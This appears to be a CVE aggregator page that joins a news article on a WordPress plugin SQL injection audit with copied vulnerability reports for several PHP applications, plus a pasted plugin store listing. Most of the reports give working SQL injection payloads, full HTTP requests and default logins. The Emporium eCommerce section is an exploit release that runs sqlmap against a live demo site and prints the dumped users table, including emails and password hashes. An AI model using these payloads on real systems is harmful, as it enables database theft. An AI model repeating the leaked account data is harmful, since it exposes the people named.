Unauthenticated SQL injection bugs put thousands of WordPress sites under threat

Unauthenticated SQL injection bugs put thousands of WordPress sites under threat

A researcher at security firm Cyllective has unearthed vulnerabilities in dozens of WordPress plugins, affecting tens of thousands of installations.

Dave Miller, who leads Cyllective’s penetration testing team, says they started out testing randomly selected plugins, quickly finding an unauthenticated SQL injection vulnerability.

They also found a series of local file inclusion and remote code execution (RCE) vulnerabilities. However, as these issues were found in severely outdated plugins, the team decided to concentrate its efforts on those that have received updates in the last two years – around 5,000 plugins in total.

**Exposed endpoints**

Looking particularly for unauthenticated SQL injection vulnerabilities, the researcher used a system of tags to identify plugins showing interaction with the WordPress database; string interpolation in SQL-like strings; security measures relating to sanitization attempts; and exposure of unauthenticated endpoints.

And after three months’ research, says Miller, the result was a total of 35 vulnerabilities, all of which could have been exploited by unauthenticated attackers, affecting around 60,500 instances running the affected WordPress plugins.

**RELATED** Unpatched plugins threaten millions of WordPress websites

“Although the vast majority of the vulnerabilities I reported were unauthenticated SQL injection vulnerabilities, which would have enabled an attacker to dump the entire WordPress database contents, these were not the most devastating ones,” Miller tells _The Daily Swig_.

“The sitemap-by-click5 plugin suffered from an unauthenticated arbitrary options update flaw, which would have allowed an attacker to maliciously enable the registration functionality and set the default user role to that of an administrator.”

This, he says, would essentially allow an unauthenticated attacker to create a new administrator account and take over the WordPress instance. And, from there, the attacker would be able to upload malicious PHP files, which would grant the attacker remote code execution capabilities on the underlying server as a low-privileged user.

**Looking for patterns**

With a bit more engineering, says Miller, the team's tag strategy could be used to fine flaws other than SQL injection vulnerabilities.

“New patterns would need to be developed which capture the specifics of the vulnerability class to be able to detect them,” he says. “Some vulnerability classes are, however, hard or even impossible to detect with this approach.”

Read more of the latest WordPress security news

Miller says that, despite the large number of vulnerabilities discovered, the disclosure process went smoothly, with the team reporting each vulnerability as it was discovered – on occasion, as many as four or five per day.

“WPScan \[a WordPress security vendor\] coordinated the process of communication between all the parties involved - researcher, plugin author and the WordPress plugin team – in a timely manner,” he says.

And, he adds, the team is still working through more plugins, with more vulnerabilities being discovered and responsibly disclosed.

“Security is ultimately the responsibility of the plugin developer, and the Plugin team encourages this to the best of its ability,” a WordPress spokesperson tells _The Daily Swi_g.

“To this end, guidelines exist for plugin authors to consult before submitting plugins to the directory. All developers are expected to abide by these guidelines. In addition, they have at their disposal a Plugin Handbook that covers security best practices.”

**DON’T MISS** W3C launches Decentralized Identifiers as a web standard

WordPress plugin security audit unearths dozens of vulnerabilities impacting 60,000 websites

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.

Permalink

**Hospital Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：admin

​ password：123456789

**vendors:** https://itsourcecode.com/free-projects/php-project/hospital-management-system-in-php-with-source-code/

**Vulnerability url:** /HMS/admin.php?editid=

**Vulnerability location:** /HMS/admin.php

When the Edit button is clicked, a request is sent to query admin information based on editid

**\[+\] Payload:** /HMS/admin.php?editid=1'%20union%20select%201%2cdatabase()%2c3%2c4%2c5%2c6%20limit%201%2c1%23

​ Leak place : editid

**Current database name:** hms

**Request package**：select admin information by editid

    GET /HMS/admin.php?editid=1'%20union%20select%201%2cdatabase()%2c3%2c4%2c5%2c6%20limit%201%2c1%23 HTTP/1.1
    Host: 10.12.171.4
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.12.171.4/HMS/viewadmin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=t9h6rke4unvvsje2tvam91601p; _ga=GA1.1.1903248581.1656124410; _gid=GA1.1.2042416137.1656124410; _gat=1
    Connection: close
    

**SQL injection result**：database name is displayed.

CVE-2022-34590: bug_report/sql_injection.md at master · Renrao/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via the grade parameter at /school/view/student_grade_wise.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：suarez081119@gmail.com

​ password：12345

**vendors:** https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

**Vulnerability url:** /school/view/student\_grade\_wise.php?grade=

**Vulnerability location:** /school/view/student\_grade\_wise.php

**\[+\] Payload:** /school/view/student\_grade\_wise.php?grade=11'%20union%20select%20database()%2c2%2c3%3b%23

​ Leak place : grade

**Current database name:** std\_db, length is 6

**Request package**：select all students whose grade is specified

    GET /school/view/student_grade_wise.php?grade=11'%20union%20select%20database()%2c2%2c3%3b%23 HTTP/1.1
    Host: 10.12.171.4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: */*
    Referer: http://10.12.171.4/school/view/all_student.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=cp26rmntdlbhle8qiofns95sv7
    Connection: close
    

**SQL injection result**：line 6 database name is displayed.

CVE-2022-34586: bug_report/sql_injection.md at master · Renrao/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via the grade parameter at /school/view/timetable_insert_form.php.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

**Login account:**

​ username：suarez081119@gmail.com

​ password：12345

**vendors:** https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

**Vulnerability url:** /school/view/timetable\_insert\_form.php?grade=

**Vulnerability location:** /school/view/timetable\_insert\_form.php

**\[+\] Payload:** /school/view/timetable\_insert\_form.php?grade=11%20union%20select%201%2cdatabase()%23

​ Leak place : grade

**Current database name:** std\_db, length is 6

**Request package**：

    GET /school/view/timetable_insert_form.php?grade=11%20union%20select%201%2cdatabase()%23 HTTP/1.1
    Host: 10.12.171.4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
    Accept: */*
    Referer: http://10.12.171.4/school/view/timetable.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: PHPSESSID=cp26rmntdlbhle8qiofns95sv7
    Connection: close
    

**SQL injection result**：line 52 database name is displayed.

CVE-2022-34588: bug_report/sql_injection3.md at master · Renrao/bug_report

Authenticated (admin or higher user role) Reflected Cross-Site Scripting (XSS) vulnerability in ThingsForRestaurants Quick Restaurant Reservations plugin <= 1.4.1 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

> Quick Restaurant Reservations is the easiest way to manage your restaurant bookings. Confirm / Reject reservations and send notifications to your customers. Manage several schedules, dates and time intervals.

**Quick Restaurant Reservations Features**

The plugin uses default WordPress functionality. Creates custom post types for Restaurants, Bookings and Clients.

*   Unlimited bookings
*   Bookings per restaurant
*   Pending, Confirm, Reject, Cancel status.
*   Notify customers about their booking status via email.
*   Manual confirmation.
*   Define min / max party
*   Early / Late bookings
*   Date format
*   Custom message after form submitted
*   Custom redirect after form submitted
*   Unlimited schedules
*   Schedule status open / close
*   Define week days and time interval for each schedule
*   Customize email notifications (admin, pending, confirmed, rejected, update)
*   Clients list
*   Form fields: date, party, time, name, email, phone, message

**ADD-ONS Features**

*   Unlimited restaurants
*   Each restaurant has its own page and booking form
*   Automatic confirmations
*   Set max capacity based on number of seats
*   Set max capacity based on tables
*   Limit automatic confirmation to max party
*   Limit automatic confirmation until X seats reached
*   Customize logo of email notifications
*   Monthly calendar view
*   Daily calendar view
*   Unlimited form custom fields

Make sure to review our ADD-ONS for Quick Restaurant Reservations page for more detailed information.

**How to use**

Add the shortcode of the restaurant form in any existing post or page:

    [qrr_form id="123"]
    

**Translations**

1.  Unzip the plugin and upload it to your site’s wp-content/plugins/ folder.
2.  Activate Quick Restaurant Reservations trough the “plugins” area in your WordPress dashboard
3.  A new menu item called “Rest. Bookings” will appear in your dashboard navigation.
4.  Go there and create a new restaurant.
5.  Define schedules for the restaurant.
6.  Copy and paste the shortcode for the bookings form in another page content.

**How do I create a booking form?**

Create a new restaurant.  
Define schedules for the restaurant.  
Insert the shortcode on any post or page.

Purchased the Capacity add on and it didn't work. We had a maximum set and we could just keep adding bookings endlessly. It didn't close off the numbers. Contacted support, no reply after a month. Put in another support ticket and asked for a refund. Same thing, no refund and no reply. We have to delete the whole plugin from our site because the capacity won't work.

I tested others plugins, this is very simple and complete. Other popular plugins don't work as well as this one.

This plugin is easy to implement and to customize.

I had a few challenges in a Wordpress multi-site environment, with a chain of 5 restaurants, each offering different arrangements on different times, different opening hours etcetera. I tried quite a few other plugins, but this one is by far the best! Support was great, even after more than several (beginner) questions, each was answered quickly and politely and the few issues that arose from this difficult setup were dealt with swiftly... Truly a 5-star review!

I love this plugin. It is exactly what I was looking for. It allows you change tags and personalize notifications. However, I couldn't edit the button text. Is it possible to do that?

Read all 8 reviews

“Quick Restaurant Reservations” is open source software. The following people have contributed to this plugin.

Contributors

*    Alejandro

**1.5.2**

*   Bulk action Cancel fixed

**1.5.1**

*   Fixed issue bulk updating bookings

**1.5.0**

*   Fixed issue email not saving format
*   Fixes issue in clients list layout

**1.4.8**

*   Fixed booking create status dropdown
*   Added new column for tables assigned

**1.4.7**

*   Fixed booking Action Selector dropdown

**1.4.6**

*   Fixed problem with emails layout

**1.4.5**

*   Fixed issue restaurant settings not saved

**1.4.4**

*   Fixed some bugs

**1.3.6**

*   Added time to Closed schedules
*   Can be closed full day or specific time

**1.3.5**

*   Fix issue with min booking duration
*   Fix issue with link to cancel booking
*   Added new column ‘Duration’
*   Integration with add-on ‘Capacity’ to export CSV

**1.3.3**

*   Added NL translation thanks to Bjron

**1.3.2**

*   Fixed issue for deleting trash old booking
*   Added booking column ID

**1.3.1**

*   Small issue with the front reservation ajax action

**1.3.0**

*   The admin table bookings has a default view for Today/Future bookings
*   New filter for Today or Future reservations at the admin table bookings list
*   New filter ‘qrr\_admin\_booking\_column\_date’ for changing the admin column Date format
*   Fixed issue calendar flickering at the front-end

**1.2.8**

*   Fixed issue with i18n date

**1.2.7**

*   Fixed small issues with front-form.php template
*   Added new filters to remove all other metaboxes from CPTs
*   filter: qrr\_restaurant\_remove\_all\_other\_metaboxes (default false)
*   filter: qrr\_client\_remove\_all\_other\_metaboxes (default false)
*   filter: qrr\_booking\_remove\_all\_other\_metaboxes (default false)

**1.2.6**

*   Fixed date translation inside the emails sent

**1.2.5**

*   Fixed action links from email sent to administrator (confirm, reject, calcel booking)
*   Added early booking new options (1 and 2 years in advance)

**1.2.0**

*   Solved bug when sending emails from admin bookings panel

**1.1.5**

*   Hours format: 24h / 12H
*   Small bugs fixed
*   Default admin email set if field is empty
*   Form date picker with >40 available translations

**1.0.5**

*   Bookings list filtering by date and restaurant.
*   Bookings list ordered by date.

**1.0.0**

*   Plugin released.

CVE-2022-29923: Quick Restaurant Reservations

Cross-Site Request Forgery (CSRF) vulnerability in WordPlus Better Messages plugin <= 1.9.9.148 at WordPress allows attackers to upload files. File attachment to messages must be activated.

CVE-2022-29454: Better Messages – Live Chat for WordPress, BuddyPress, BuddyBoss, Ultimate Member, PeepSo

Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /pages/household/household.php.

Permalink

**Barangay Management System v1.0 by itsourcecode.com has SQL injection**

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Vulnerability File: /bmis/pages/household/household.php

Vulnerability location: /bmis/pages/household/household.php,hidden\_id

\[+\] Payload: hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> hidden\_id

POST /bmis/pages/household/household.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/household/household.php
Cookie: sessions=aj0k5o11d743ingah9kp1b0ejntrqer6; PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&hiddennum=1&txt\_edit\_zone=1&txt\_edit\_totalmembers=&btn\_save=Save&table\_length=10

CVE-2022-34042: bug_report/SQLi-1.md at main · tianqi5432/bug_report

Emporium eCommerce Online Shopping CMS version 1.2 suffers from a remote SQL injection vulnerability.

    ┌┌────────────────────────────────────────────────────────────────────────────────────┐││                                  C r a C k E r                                    ┌┘┌┘              T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────          From The Ashes and Dust Rises An Unimaginable crack....           ────┐┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘                                   [ Exploits ]                                    ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                     │ │                                         :│  Website  : mybizcms.com                │ │                                         ││  Vendor   : mybizcms                    │ │                                         ││  Software : Emporium eCommerce -        │ │                                         ││             Online Shopping CMS v 1.2   │ │ Emporium eCommerce                      ││  Vuln Type: Remote SQL Injection        │ │                                         ││  Method   : GET                         │ │ is a complete online                    ││  Critical : High [░░▒▒▓▓██]             │ │ shopping platform for all your needs    ││  Impact   : Database Access             │ │                                         ││                                         │ │                                         ││ ────────────────────────────────────────┘ └─────────────────────────────────────────││                           B4nks-NET irc.b4nks.tk #unix                             ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                     :│  Release Notes:                                                                     ││  ═════════════                                                                      ││  Typically used for remotely exploitable vulnerabilities that can lead to           ││  system compromise.                                                                 ││                                                                                     │┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                   ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘Greets:       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk     loool, DevS, Dark-Gost       CryptoJob (Twitter) twitter.com/CryptozJob┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘                                 © CraCkEr 2022                                    ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?GET parameter 'min_price' is vulnerable---Parameter: min_price (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)    Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41---GET parameter 'percentage' is vulnerable.---Parameter: percentage (GET)    Type: boolean-based blind    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)    Payload: percentage=MAKE_SET(4728=4728,5649)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)---GET parameter 'review_ratings' is vulnerable---Parameter: review_ratings (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)---GET parameter 'brand[]' is vulnerable---Parameter: brand[] (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: brand[]=15');SELECT SLEEP(5)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc---Live Demo Site:https://mybizcms.com/demos/multivendor/[+] Starting the Attacksqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent[INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 7.3.33, PHPback-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'mybizcms_multivendor'fetching tables for database: 'mybizcms_multivendor'[101 tables] +--------------------------+| returns                  || ad_placements            || addresses                || ads                      || attribute_items          || attributes               || authorize_net_settings   || brands                   || categories               || collections              || company                  || counties                 || countries                || credit_card_types        || cronjobs                 || customers                || deliveries               || delivery_items           || delivery_options         || delivery_status          || discounts                || email_templates          || facebook_settings        || faqs                     || flash_sale_items         || flash_sales              || flutterwave_settings     || github_settings          || google_settings          || item_status              || labels                   || linkedin_settings        || logs                     || media                    || mpesa_settings           || newsletters              || notifications            || options                  || order_details            || order_items              || order_status             || orders                   || pages                    || payment_options          || payment_status           || payments                 || payout_modes             || payout_status            || payouts                  || paypal_pro_settings      || paypal_standard_settings || paytm_settings           || payu_money_settings      || permissions              || pesapal_settings         || pickup_stations          || post_categories          || post_comments            || posts                    || product_attributes       || product_images           || product_reviews          || product_stock            || product_types            || product_variants         || product_wholesales       || products                 || quicks                   || return_reasons           || return_status            || rewards                  || role_sub_permissions     || roles                    || saved_items              || sessions                 || shipping_fees            || shipping_regions         || shipping_weights         || shops                    || sliders                  || stripe_settings          || sub_permissions          || subscribers              || supported_currencies     || tags                     || taxes                    || temp_data                || ticket_priority          || ticket_replies           || ticket_status            || tickets                  || timezones                || twitter_settings         || twocheckout_settings     || user_status              || user_sub_permissions     || users                    || variant_choices          || variant_options          || wallets                  || weights                  |+--------------------------+ fetching columns for table 'users' in database 'mybizcms_multivendor' Table: users[34 columns] +------------------------+--------------+| Column                 | Type         |+------------------------+--------------+| calling_code           | varchar(11)  || city                   | varchar(100) || company                | varchar(100) || country_id             | int(11)      || date_added             | datetime     || default_billing        | int(11)      || default_currency       | int(11)      || default_language       | varchar(40)  || default_shipping       | int(11)      || department_id          | int(11)      || email                  | varchar(100) || firstname              | varchar(50)  || last_ip                | varchar(40)  || last_login             | datetime     || last_password_change   | datetime     || lastname               | varchar(50)  || latitude               | varchar(300) || longitude              | varchar(300) || new_pass_key_requested | datetime     || passkey                | varchar(32)  || password               | varchar(256) || payout_address         | longtext     || payout_mode_id         | int(11)      || phone                  | varchar(30)  || postal_code            | varchar(100) || profile_image          | varchar(150) || role_id                | int(11)      || state                  | varchar(50)  || street                 | varchar(100) || user_id                | int(11)      || user_status_id         | int(11)      || user_uid               | varchar(50)  || username               | varchar(100) || zip_code               | varchar(15)  |+------------------------+--------------+ fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor' Database: mybizcms_multivendorTable: users[7 entries] +----------+--------------------------------------------------------------+------------------------+| username | password                                                     | email                  |+----------+--------------------------------------------------------------+------------------------+| admin    | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com     || one      | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com || two      | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con         || umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com      || three    | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com          || user     | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com      || tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com    |+----------+--------------------------------------------------------------+------------------------+[-] Done

Emporium eCommerce Online Shopping CMS 1.2 SQL Injection

The debug interface of Goldshell ASIC Miners v2.2.1 and below was discovered to be exposed publicly on the web interface, allowing attackers to access passwords and other sensitive information in plaintext.

CVE-2022-24660: Cryptocurrency ASIC Miners – Security and Hacking Audit – James A. Chambers

A vulnerability was found in SourceCodester Library Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /index.php. The manipulation of the argument RollNo with the input admin' AND (SELECT 2625 FROM (SELECT(SLEEP(5)))MdIL) AND 'KXmq'='KXmq&Password=1231312312 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

    POST /admin/lab.php HTTP/1.1
    Host: [IP:PORT]
    Connection: close
    Content-Length: 208
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: null
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    
    submit=1&Section=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71716b7171,0x546e4444736b7743575a666d4873746a6450616261527a67627944426946507245664143694c6a4c,0x7162706b71),NULL,NULL,NULL,NULL#&Status=1
    

    POST /index.php HTTP/1.1
    Host: www.l-ms.com
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 111
    
    RollNo=admin' AND (SELECT 2625 FROM (SELECT(SLEEP(5)))MdIL) AND 'KXmq'='KXmq&Password=1231312312&signin=Sign In

Tag

#php